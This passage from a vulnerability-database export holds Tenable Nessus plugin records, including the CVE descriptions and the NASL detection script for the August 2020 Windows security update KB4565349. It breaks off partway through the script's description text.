Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571692'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571692])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-27T14:22:55", "description": "The remote Windows host is missing security update 4565349.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user 
rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1525, CVE-2020-1554)\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1569)\n\n - An elevation of privilege vulnerability exists when the Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. 
An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the Windows Custom Protocol Engine improperly handles memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. 
An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. 
The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the Windows Network Connection Broker improperly handles memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when the Windows Speech Shell Components improperly handle memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. 
(CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
(CVE-2020-1533, CVE-2020-1556)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass. An attacker who successfully exploited the vulnerability could retrieve the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1479)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1561, CVE-2020-1562)\n\n - An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. 
(CVE-2020-1512)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4565349: Windows 10 Version 1809 and Windows Server 2019 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1417", "CVE-2020-1464", "CVE-2020-1466", "CVE-2020-1467", "CVE-2020-1470", "CVE-2020-1472", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1479", "CVE-2020-1480", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1490", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1511", "CVE-2020-1512", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1521", "CVE-2020-1522", "CVE-2020-1524", "CVE-2020-1525", "CVE-2020-1526", "CVE-2020-1527", "CVE-2020-1528", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1531", "CVE-2020-1533", "CVE-2020-1534", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1548", "CVE-2020-1549", "CVE-2020-1550", 
"CVE-2020-1552", "CVE-2020-1553", "CVE-2020-1554", "CVE-2020-1555", "CVE-2020-1556", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1561", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1566", "CVE-2020-1567", "CVE-2020-1568", "CVE-2020-1569", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1578", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_AUG_4565349.NASL", "href": "https://www.tenable.com/plugins/nessus/139484", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139484);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1417\",\n \"CVE-2020-1464\",\n \"CVE-2020-1466\",\n \"CVE-2020-1467\",\n \"CVE-2020-1470\",\n \"CVE-2020-1472\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1479\",\n \"CVE-2020-1480\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1490\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1511\",\n \"CVE-2020-1512\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1521\",\n \"CVE-2020-1522\",\n \"CVE-2020-1524\",\n \"CVE-2020-1525\",\n \"CVE-2020-1526\",\n \"CVE-2020-1527\",\n \"CVE-2020-1528\",\n 
\"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1531\",\n \"CVE-2020-1533\",\n \"CVE-2020-1534\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1548\",\n \"CVE-2020-1549\",\n \"CVE-2020-1550\",\n \"CVE-2020-1552\",\n \"CVE-2020-1553\",\n \"CVE-2020-1554\",\n \"CVE-2020-1555\",\n \"CVE-2020-1556\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1561\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1566\",\n \"CVE-2020-1567\",\n \"CVE-2020-1568\",\n \"CVE-2020-1569\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1578\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"IAVA\", value:\"2020-A-0361-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0370-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4565349\");\n script_xref(name:\"MSFT\", value:\"MS20-4565349\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"KB4565349: Windows 10 Version 1809 and Windows Server 2019 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 
host is missing security update 4565349.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1525, CVE-2020-1554)\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-1511)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1569)\n\n - An elevation of privilege vulnerability exists when the\n Windows CDP User Components improperly handle memory.\n (CVE-2020-1549, CVE-2020-1550)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An elevation of privilege vulnerability exists when the\n Windows Radio Manager API improperly handles memory.\n (CVE-2020-1528)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge (HTML-based). The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. 
An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2020-1555)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the\n Windows Custom Protocol Engine improperly handles\n memory. (CVE-2020-1527)\n\n - An elevation of privilege vulnerability exists when the\n Storage Service improperly handles file operations. An\n attacker who successfully exploited this vulnerability\n could gain elevated privileges on the victim system.\n (CVE-2020-1490)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
(CVE-2020-1480, CVE-2020-1529)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Runtime improperly handles memory.\n (CVE-2020-1521, CVE-2020-1522)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when the\n Windows Accounts Control improperly handles memory.\n (CVE-2020-1531)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1553)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. 
(CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n Windows Network Connection Broker improperly handles\n memory. (CVE-2020-1526)\n\n - An elevation of privilege vulnerability exists when the\n Windows Speech Shell Components improperly handle\n memory. (CVE-2020-1524)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. If the current\n user is logged on with administrative user rights, an\n attacker could take control of an affected system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-1568)\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC). An attacker who\n successfully exploited the vulnerability could run a\n specially crafted application on a device on the\n network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows WaasMedic Service improperly handles memory.\n (CVE-2020-1548)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1417, CVE-2020-1486, CVE-2020-1566)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1533, CVE-2020-1556)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2020-1578)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited 